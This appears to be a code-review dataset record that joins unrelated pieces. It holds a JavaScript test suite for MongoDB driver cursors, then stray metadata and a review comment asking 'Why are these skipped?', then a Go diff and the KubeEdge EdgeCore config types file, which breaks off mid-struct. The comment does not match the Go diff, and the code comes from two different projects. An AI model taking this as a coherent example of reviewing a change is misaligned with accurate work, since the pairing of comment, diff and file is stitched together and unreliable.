docs.forEach(function(x) { test.equal(1, x.a); }); client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to next', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = 
db.collection('map_next'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.next(function(err, doc) { test.equal(null, err); test.equal(1, doc.a); // Close cursor b/c we did not exhaust cursor cursor.close(); client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to each', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_each'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.each(function(err, doc) { test.equal(null, err); if (doc) { test.equal(1, doc.a); } else { client.close(); done(); } }); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to forEach', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var 
i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_forEach'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 2 }; }) .map(function(x) { return { a: x.a * x.a }; }) .batchSize(5) .limit(10); cursor.forEach( function(doc) { test.equal(4, doc.a); }, function(err) { test.equal(null, err); client.close(); done(); } ); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply multiple uses of map and apply forEach', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_mapmapforEach'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.forEach( function(doc) { test.equal(1, doc.a); }, function(err) { test.equal(null, err); client.close(); done(); } ); }); 
}); } }); /** * @ignore * @api private */ it('Should correctly apply skip and limit to large set of documents', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('cursor_limit_skip_correctly'); // Insert x number of docs var ordered = collection.initializeUnorderedBulkOp(); for (var i = 0; i < 6000; i++) { ordered.insert({ a: i }); } ordered.execute({ w: 1 }, function(err) { test.equal(null, err); // Let's attempt to skip and limit collection .find({}) .limit(2016) .skip(2016) .toArray(function(err, docs) { test.equal(null, err); test.equal(2016, docs.length); client.close(); done(); }); }); }); } }); /** * @ignore */ it('should tail cursor using maxAwaitTimeMS for 3.2 or higher', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single'], mongodb: '>3.1.9' } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data_max_awaittime_ms', options, function( err, collection ) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); var s = new Date(); // Create cursor with awaitdata, and timeout after the period 
specified var cursor = collection .find({}) .addCursorFlag('tailable', true) .addCursorFlag('awaitData', true) .maxAwaitTimeMS(500); cursor.each(function(err, result) { test.equal(null, err); if (result) { setTimeout(function() { cursor.kill(); }, 300); } else { test.ok(new Date().getTime() - s.getTime() >= 500); client.close(); done(); } }); }); }); }); } }); /** * @ignore * @api private */ it('Should not emit any events after close event emitted due to cursor killed', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('cursor_limit_skip_correctly'); // Insert x number of docs var ordered = collection.initializeUnorderedBulkOp(); for (var i = 0; i < 100; i++) { ordered.insert({ a: i }); } ordered.execute({ w: 1 }, function(err) { test.equal(null, err); // Let's attempt to skip and limit var cursor = collection.find({}).batchSize(10); cursor.on('data', function() { cursor.destroy(); }); cursor.on('close', function() { client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlyExecuteEnsureIndexWithNoCallback', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { createdAt: new Date(d) }; } var configuration = this.configuration; var 
client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('shouldCorrectlyExecuteEnsureIndexWithNoCallback', function( err, collection ) { test.equal(null, err); // ensure index of createdAt index collection.ensureIndex({ createdAt: 1 }, function(err) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Find with sort collection .find() .sort(['createdAt', 'asc']) .toArray(function(err, items) { test.equal(null, err); test.equal(1, items.length); client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor with limit and skip', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 50; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_1_', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor .limit(100) .skip(0) .count(function(err, c) { test.equal(null, err); test.equal(50, c); var cursor = collection.find({}); cursor .limit(100) .skip(0) .toArray(function(err) { test.equal(null, err); 
test.equal(50, c); client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly handle negative batchSize and set the limit', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; var configuration = this.configuration; var Long = configuration.require.Long; for (var i = 0; i < 50; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_1_', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor.batchSize(-10).next(function(err) { test.equal(null, err); test.ok(cursor.cursorState.cursorId.equals(Long.ZERO)); client.close(); done(); }); }); }); }); } }); it('Correcly decorate the cursor count command with skip, limit, hint, readConcern', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var started = []; var listener = require('../..').instrument(function(err) { test.equal(null, err); }); listener.on('started', function(event) { if (event.commandName === 'count') started.push(event); }); var configuration = this.configuration; var client = 
configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db .collection('cursor_count_test', { readConcern: { level: 'local' } }) .find({ project: '123' }) .limit(5) .skip(5) .hint({ project: 1 }) .count(true, function(err) { test.equal(null, err); test.equal(1, started.length); if (started[0].command.readConcern) test.deepEqual({ level: 'local' }, started[0].command.readConcern); test.deepEqual({ project: 1 }, started[0].command.hint); test.equal(5, started[0].command.skip); test.equal(5, started[0].command.limit); listener.uninstrument(); client.close(); done(); }); }); } }); it('Correcly decorate the collection cursor count command with skip, limit, hint, readConcern', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var started = []; var listener = require('../..').instrument(function(err) { test.equal(null, err); }); listener.on('started', function(event) { if (event.commandName === 'count') started.push(event); }); var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.collection('cursor_count_test1', { readConcern: { level: 'local' } }).count( { project: '123' }, { readConcern: { level: 'local' }, limit: 5, skip: 5, hint: { project: 1 } }, function(err) { test.equal(null, err); test.equal(1, started.length); if (started[0].command.readConcern) test.deepEqual({ level: 'local' }, started[0].command.readConcern); test.deepEqual({ project: 1 }, started[0].command.hint); test.equal(5, started[0].command.skip); test.equal(5, 
started[0].command.limit); listener.uninstrument(); client.close(); done(); } ); }); } }); it('Should properly kill a cursor', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>=3.2.0' } }, // The actual test we wish to run test: function() { // Load up the documents const docs = []; for (let i = 0; i < 1000; i += 1) { docs.push({ a: i }); } const configuration = this.configuration; const client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); let cleanup = () => {}; let caughtError = undefined; return ( client // Connect .connect() .then(function(client) { cleanup = () => client.close(); const db = client.db(configuration.db); const collection = db.collection('cursorkilltest1'); // Insert 1000 documents return collection.insert(docs).then(() => { // Generate cursor for find operation const cursor = collection.find({}); // Iterate cursor past first element return cursor .next() .then(() => cursor.next()) .then(() => { // Confirm that cursorId is non-zero const longId = cursor.cursorState.cursorId; expect(longId) .to.be.an('object') .and.to.haveOwnProperty('_bsontype', 'Long'); const id = longId.toNumber(); expect(id).to.not.equal(0); // Kill cursor return new Promise((resolve, reject) => cursor.kill((err, r) => (err ? reject(err) : resolve(r))) ).then(response => { // sharded clusters will return a long, single return integers if ( response && response.cursorsKilled && Array.isArray(response.cursorsKilled) ) { response.cursorsKilled = response.cursorsKilled.map( id => (typeof id === 'number' ? Long.fromNumber(id) : id) ); } expect(response.ok).to.equal(1); expect(response.cursorsKilled[0].equals(longId)).to.be.ok; cursor.close(); client.close(); }); }); }); }) // Clean up. 
Make sure that even in case of error, we still always clean up connection .catch(e => (caughtError = e)) .then(cleanup) .then(() => { if (caughtError) { throw caughtError; } }) ); } }); // NOTE: This is skipped because I don't think its correct or adds value. The expected error // is not an error with hasNext (from server), but rather a local TypeError which should // be caught anyway. The only solution here would be to wrap the entire top level call // in a try/catch which is not going to happen. it.skip('Should propagate hasNext errors when using a callback', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, test: function(done) { var configuration = this.configuration; var client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var findCommand = { find: 'integration_tests.has_next_error_callback', limit: 0, skip: 0, query: {}, slaveOk: false }; var cursor = db.s.topology.cursor(db.s.namespace, findCommand, { readPreference: 42 }); cursor.hasNext(function(err) { test.ok(err !== null); test.equal(err.message, 'readPreference must be a ReadPreference instance'); done(); }); }); } }); it( 'should return implicit session to pool when client-side cursor exhausts results on initial query', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>=3.6.0' } }, test: function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { test.equal(null, err); const db = client.db(configuration.db); const collection = db.collection('cursor_session_tests'); collection.insertMany([{ a: 1, b: 2 }], function(err) { test.equal(null, err); const cursor = collection.find({}); cursor.next(function() { 
test.equal(client.topology.s.sessions.length, 0); client.close(); done(); }); }); }); } } ); it( 'should return implicit session to pool when client-side cursor exhausts results after a getMore', { metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>=3.6.0' } }, test: function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { test.equal(null, err); const db = client.db(configuration.db); const collection = db.collection('cursor_session_tests2'); const docs = [ { a: 1, b: 2 }, { a: 3, b: 4 }, { a: 5, b: 6 }, { a: 7, b: 8 }, { a: 9, b: 10 } ]; collection.insertMany(docs, function(err) { test.equal(null, err); const cursor = collection.find({}, { batchSize: 3 }); cursor.next(function() { test.equal(client.topology.s.sessions.length, 1); cursor.next(function() { test.equal(client.topology.s.sessions.length, 1); cursor.next(function() { test.equal(client.topology.s.sessions.length, 1); cursor.next(function() { test.equal(client.topology.s.sessions.length, 0); client.close(); done(); }); }); }); }); }); }); } } ); it('should return a promise when no callback supplied to forEach method', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, client) { const db = client.db(configuration.db); const collection = db.collection('cursor_session_tests2'); const cursor = collection.find(); expect(cursor.forEach()).to.exist.and.to.be.an.instanceof(cursor.s.promiseLibrary); cursor.close(() => client.close(() => done())); }); }); it('should return false when exhausted and hasNext called more than once', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); client.connect(function(err, 
client) { const db = client.db(configuration.db); db.createCollection('cursor_hasNext_test').then(function() { const cursor = db.collection('cursor_hasNext_test').find(); cursor .hasNext() .then(function(val1) { expect(val1).to.equal(false); return cursor.hasNext(); }) .then(function(val2) { expect(val2).to.equal(false); cursor.close(() => client.close(() => done())); }) .catch(err => { cursor.close(() => client.close(() => done(err))); }); }); }); }); function testTransformStream(config, done) { const client = config.client; const configuration = config.configuration; const collectionName = config.collectionName; const transformFunc = config.transformFunc; const expectedSet = config.expectedSet; client.connect(function(err, client) { const db = client.db(configuration.db); let collection, cursor; const docs = [ { _id: 0, a: { b: 1, c: 0 } }, { _id: 1, a: { b: 1, c: 0 } }, { _id: 2, a: { b: 1, c: 0 } } ]; const resultSet = new Set(); const transformParam = transformFunc != null ? { transform: transformFunc } : null; const close = e => cursor.close(() => client.close(() => done(e))); Promise.resolve() .then(() => db.createCollection(collectionName)) .then(() => (collection = db.collection(collectionName))) .then(() => collection.insertMany(docs)) .then(() => collection.find()) .then(_cursor => (cursor = _cursor)) .then(() => cursor.transformStream(transformParam)) .then(stream => { stream.on('data', function(doc) { resultSet.add(doc); }); stream.once('end', function() { expect(resultSet).to.deep.equal(expectedSet); close(); }); stream.once('error', function(e) { close(e); }); }) .catch(e => close(e)); }); } it('transformStream should apply the supplied transformation function to each document in the stream', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); const expectedDocs = [{ _id: 0, b: 1, c: 0 }, { _id: 1, b: 1, c: 0 }, { _id: 2, b: 1, c: 0 }]; const config = { 
client: client, configuration: configuration, collectionName: 'transformStream-test-transform', transformFunc: doc => ({ _id: doc._id, b: doc.a.b, c: doc.a.c }), expectedSet: new Set(expectedDocs) }; testTransformStream(config, done); }); it('transformStream should return a stream of unmodified docs if no transform function applied', function(done) { const configuration = this.configuration; const client = configuration.newClient({ w: 1 }, { poolSize: 1, auto_reconnect: false }); const expectedDocs = [ { _id: 0, a: { b: 1, c: 0 } }, { _id: 1, a: { b: 1, c: 0 } }, { _id: 2, a: { b: 1, c: 0 } } ]; const config = { client: client, configuration: configuration, collectionName: 'transformStream-test-notransform', transformFunc: null, expectedSet: new Set(expectedDocs) }; testTransformStream(config, done); }); it('should apply parent read preference to count command', function(done) { const configuration = this.configuration; const ReadPreference = this.configuration.require.ReadPreference; const client = configuration.newClient( { w: 1, readPreference: ReadPreference.SECONDARY }, { poolSize: 1, auto_reconnect: false, connectWithNoPrimary: true } ); client.connect(function(err, client) { expect(err).to.not.exist; const db = client.db(configuration.db); let collection, cursor, spy; const close = e => cursor.close(() => client.close(() => done(e))); Promise.resolve() .then(() => new Promise(resolve => setTimeout(() => resolve(), 500))) .then(() => db.createCollection('test_count_readPreference')) .then(() => (collection = db.collection('test_count_readPreference'))) .then(() => collection.find()) .then(_cursor => (cursor = _cursor)) .then(() => (spy = sinon.spy(cursor.s.topology, 'command'))) .then(() => cursor.count()) .then(() => expect(spy.firstCall.args[2]) .to.have.nested.property('readPreference.mode') .that.equals('secondary') ) .then(() => close()) .catch(e => close(e)); }); }); });
1
14,961
Why are these skipped?
mongodb-node-mongodb-native
js
@@ -388,6 +388,13 @@ type MetaManager struct { // RemoteQueryTimeout indicates remote query timeout (second) // default 60 RemoteQueryTimeout int32 `json:"remoteQueryTimeout,omitempty"` + // The config of MetaServer + MetaServer `json:"metaServer,omitempty"` +} + +type MetaServer struct { + Enable bool + Debug bool } // ServiceBus indicates the ServiceBus module config
1
/* Copyright 2019 The KubeEdge Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package v1alpha1 import ( "time" v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" metaconfig "github.com/kubeedge/kubeedge/pkg/apis/componentconfig/meta/v1alpha1" ) const ( EdgeMeshDefaultLoadBalanceStrategy = "RoundRobin" EdgeMeshDefaultInterface = "docker0" EdgeMeshDefaultSubNet = "9.251.0.0/16" EdgeMeshDefaultListenPort = 40001 ) const ( MqttModeInternal MqttMode = 0 MqttModeBoth MqttMode = 1 MqttModeExternal MqttMode = 2 ) const ( CGroupDriverCGroupFS = "cgroupfs" CGroupDriverSystemd = "systemd" ) const ( // DataBaseDriverName is sqlite3 DataBaseDriverName = "sqlite3" // DataBaseAliasName is default DataBaseAliasName = "default" // DataBaseDataSource is edge.db DataBaseDataSource = "/var/lib/kubeedge/edgecore.db" ) type ProtocolName string type MqttMode int // EdgeCoreConfig indicates the EdgeCore config which read from EdgeCore config file type EdgeCoreConfig struct { metav1.TypeMeta // DataBase indicates database info // +Required DataBase *DataBase `json:"database,omitempty"` // Modules indicates EdgeCore modules config // +Required Modules *Modules `json:"modules,omitempty"` } // DataBase indicates the database info type DataBase struct { // DriverName indicates database driver name // default "sqlite3" DriverName string `json:"driverName,omitempty"` // AliasName indicates alias name // default "default" AliasName string `json:"aliasName,omitempty"` // DataSource indicates the data 
source path // default "/var/lib/kubeedge/edgecore.db" DataSource string `json:"dataSource,omitempty"` } // Modules indicates the modules which edgeCore will be used type Modules struct { // Edged indicates edged module config // +Required Edged *Edged `json:"edged,omitempty"` // EdgeHub indicates edgeHub module config // +Required EdgeHub *EdgeHub `json:"edgeHub,omitempty"` // EventBus indicates eventBus config for edgeCore // +Required EventBus *EventBus `json:"eventBus,omitempty"` // MetaManager indicates meta module config // +Required MetaManager *MetaManager `json:"metaManager,omitempty"` // ServiceBus indicates serviceBus module config ServiceBus *ServiceBus `json:"serviceBus,omitempty"` // DeviceTwin indicates deviceTwin module config DeviceTwin *DeviceTwin `json:"deviceTwin,omitempty"` // DBTest indicates dbTest module config DBTest *DBTest `json:"dbTest,omitempty"` // EdgeMesh indicates edgeMesh module config // +Required EdgeMesh *EdgeMesh `json:"edgeMesh,omitempty"` // EdgeStream indicates edgestream module config // +Required EdgeStream *EdgeStream `json:"edgeStream,omitempty"` } // Edged indicates the config fo edged module // edged is lighted-kubelet type Edged struct { // Enable indicates whether edged is enabled, // if set to false (for debugging etc.), skip checking other edged configs. 
// default true Enable bool `json:"enable,omitempty"` // Labels indicates current node labels Labels map[string]string `json:"labels,omitempty"` // Annotations indicates current node annotations Annotations map[string]string `json:"annotations,omitempty"` // Taints indicates current node taints Taints []v1.Taint `json:"taints,omitempty"` // NodeStatusUpdateFrequency indicates node status update frequency (second) // default 10 NodeStatusUpdateFrequency int32 `json:"nodeStatusUpdateFrequency,omitempty"` // RuntimeType indicates cri runtime ,support: docker, remote // default "docker" RuntimeType string `json:"runtimeType,omitempty"` // DockerAddress indicates docker server address // default "unix:///var/run/docker.sock" DockerAddress string `json:"dockerAddress,omitempty"` // RemoteRuntimeEndpoint indicates remote runtime endpoint // default "unix:///var/run/dockershim.sock" RemoteRuntimeEndpoint string `json:"remoteRuntimeEndpoint,omitempty"` // RemoteImageEndpoint indicates remote image endpoint // default "unix:///var/run/dockershim.sock" RemoteImageEndpoint string `json:"remoteImageEndpoint,omitempty"` // NodeIP indicates current node ip // default get local host ip NodeIP string `json:"nodeIP"` // ClusterDNS indicates cluster dns // Note: Can not use "omitempty" option, It will affect the output of the default configuration file // +Required ClusterDNS string `json:"clusterDNS"` // ClusterDomain indicates cluster domain // Note: Can not use "omitempty" option, It will affect the output of the default configuration file ClusterDomain string `json:"clusterDomain"` // EdgedMemoryCapacity indicates memory capacity (byte) // default 7852396000 EdgedMemoryCapacity int64 `json:"edgedMemoryCapacity,omitempty"` // PodSandboxImage is the image whose network/ipc namespaces containers in each pod will use. 
// +Required // kubeedge/pause:3.1 for x86 arch // kubeedge/pause-arm:3.1 for arm arch // kubeedge/pause-arm64 for arm64 arch // default kubeedge/pause:3.1 PodSandboxImage string `json:"podSandboxImage,omitempty"` // ImagePullProgressDeadline indicates image pull progress dead line (second) // default 60 ImagePullProgressDeadline int32 `json:"imagePullProgressDeadline,omitempty"` // RuntimeRequestTimeout indicates runtime request timeout (second) // default 2 RuntimeRequestTimeout int32 `json:"runtimeRequestTimeout,omitempty"` // HostnameOverride indicates hostname // default os.Hostname() HostnameOverride string `json:"hostnameOverride,omitempty"` // RegisterNode enables automatic registration // default true RegisterNode bool `json:"registerNode,omitempty"` //RegisterNodeNamespace indicates register node namespace // default "default" RegisterNodeNamespace string `json:"registerNodeNamespace,omitempty"` // InterfaceName indicates interface name // default "eth0" // DEPRECATED after v1.5 InterfaceName string `json:"interfaceName,omitempty"` // ConcurrentConsumers indicates concurrent consumers for pod add or remove operation // default 5 ConcurrentConsumers int `json:"concurrentConsumers,omitempty"` // DevicePluginEnabled indicates enable device plugin // default false // Note: Can not use "omitempty" option, it will affect the output of the default configuration file DevicePluginEnabled bool `json:"devicePluginEnabled"` // GPUPluginEnabled indicates enable gpu plugin // default false, // Note: Can not use "omitempty" option, it will affect the output of the default configuration file GPUPluginEnabled bool `json:"gpuPluginEnabled"` // ImageGCHighThreshold indicates image gc high threshold (percent) // default 80 ImageGCHighThreshold int32 `json:"imageGCHighThreshold,omitempty"` // ImageGCLowThreshold indicates image gc low threshold (percent) // default 40 ImageGCLowThreshold int32 `json:"imageGCLowThreshold,omitempty"` // MaximumDeadContainersPerPod indicates max 
num dead containers per pod // default 1 MaximumDeadContainersPerPod int32 `json:"maximumDeadContainersPerPod,omitempty"` // CGroupDriver indicates container cgroup driver, support: cgroupfs, systemd // default "cgroupfs" // +Required CGroupDriver string `json:"cgroupDriver,omitempty"` // NetworkPluginName indicates the name of the network plugin to be invoked, // if an empty string is specified, use noop plugin // default "" NetworkPluginName string `json:"networkPluginName,omitempty"` // CNIConfDir indicates the full path of the directory in which to search for CNI config files // default "/etc/cni/net.d" CNIConfDir string `json:"cniConfDir,omitempty"` // CNIBinDir indicates a comma-separated list of full paths of directories // in which to search for CNI plugin binaries // default "/opt/cni/bin" CNIBinDir string `json:"cniBinDir,omitempty"` // CNICacheDir indicates the full path of the directory in which CNI should store cache files // default "/var/lib/cni/cache" CNICacheDir string `json:"cniCacheDirs,omitempty"` // NetworkPluginMTU indicates the MTU to be passed to the network plugin // default 1500 NetworkPluginMTU int32 `json:"networkPluginMTU,omitempty"` // CgroupsPerQOS enables QoS based Cgroup hierarchy: top level cgroups for QoS Classes // And all Burstable and BestEffort pods are brought up under their // specific top level QoS cgroup. // Default: true CgroupsPerQOS bool `json:"cgroupsPerQOS"` // CgroupRoot is the root cgroup to use for pods. // If CgroupsPerQOS is enabled, this is the root of the QoS cgroup hierarchy. // Default: "" CgroupRoot string `json:"cgroupRoot"` // EdgeCoreCgroups is the absolute name of cgroups to isolate the edgecore in // Dynamic Kubelet Config (beta): This field should not be updated without a full node // reboot. It is safest to keep this value the same as the local config. 
// Default: "" EdgeCoreCgroups string `json:"edgeCoreCgroups,omitempty"` // systemCgroups is absolute name of cgroups in which to place // all non-kernel processes that are not already in a container. Empty // for no container. Rolling back the flag requires a reboot. // Dynamic Kubelet Config (beta): This field should not be updated without a full node // reboot. It is safest to keep this value the same as the local config. // Default: "" SystemCgroups string `json:"systemCgroups,omitempty"` // How frequently to calculate and cache volume disk usage for all pods // Dynamic Kubelet Config (beta): If dynamically updating this field, consider that // shortening the period may carry a performance impact. // Default: "1m" VolumeStatsAggPeriod time.Duration `json:"volumeStatsAggPeriod,omitempty"` // EnableMetrics indicates whether enable the metrics // default true EnableMetrics bool `json:"enableMetrics,omitempty"` } // EdgeHub indicates the EdgeHub module config type EdgeHub struct { // Enable indicates whether EdgeHub is enabled, // if set to false (for debugging etc.), skip checking other EdgeHub configs. 
// default true Enable bool `json:"enable,omitempty"` // Heartbeat indicates heart beat (second) // default 15 Heartbeat int32 `json:"heartbeat,omitempty"` // ProjectID indicates project id // default e632aba927ea4ac2b575ec1603d56f10 ProjectID string `json:"projectID,omitempty"` // TLSCAFile set ca file path // default "/etc/kubeedge/ca/rootCA.crt" TLSCAFile string `json:"tlsCaFile,omitempty"` // TLSCertFile indicates the file containing x509 Certificate for HTTPS // default "/etc/kubeedge/certs/server.crt" TLSCertFile string `json:"tlsCertFile,omitempty"` // TLSPrivateKeyFile indicates the file containing x509 private key matching tlsCertFile // default "/etc/kubeedge/certs/server.key" TLSPrivateKeyFile string `json:"tlsPrivateKeyFile,omitempty"` // Quic indicates quic config for EdgeHub module // Optional if websocket is configured Quic *EdgeHubQUIC `json:"quic,omitempty"` // WebSocket indicates websocket config for EdgeHub module // Optional if quic is configured WebSocket *EdgeHubWebSocket `json:"websocket,omitempty"` // Token indicates the priority of joining the cluster for the edge Token string `json:"token"` // HTTPServer indicates the server for edge to apply for the certificate. 
HTTPServer string `json:"httpServer,omitempty"` // RotateCertificates indicates whether edge certificate can be rotated // default true RotateCertificates bool `json:"rotateCertificates,omitempty"` } // EdgeHubQUIC indicates the quic client config type EdgeHubQUIC struct { // Enable indicates whether enable this protocol // default false Enable bool `json:"enable,omitempty"` // HandshakeTimeout indicates hand shake timeout (second) // default 30 HandshakeTimeout int32 `json:"handshakeTimeout,omitempty"` // ReadDeadline indicates read dead line (second) // default 15 ReadDeadline int32 `json:"readDeadline,omitempty"` // Server indicates quic server address (ip:port) // +Required Server string `json:"server,omitempty"` // WriteDeadline indicates write dead line (second) // default 15 WriteDeadline int32 `json:"writeDeadline,omitempty"` } // EdgeHubWebSocket indicates the websocket client config type EdgeHubWebSocket struct { // Enable indicates whether enable this protocol // default true Enable bool `json:"enable,omitempty"` // HandshakeTimeout indicates handshake timeout (second) // default 30 HandshakeTimeout int32 `json:"handshakeTimeout,omitempty"` // 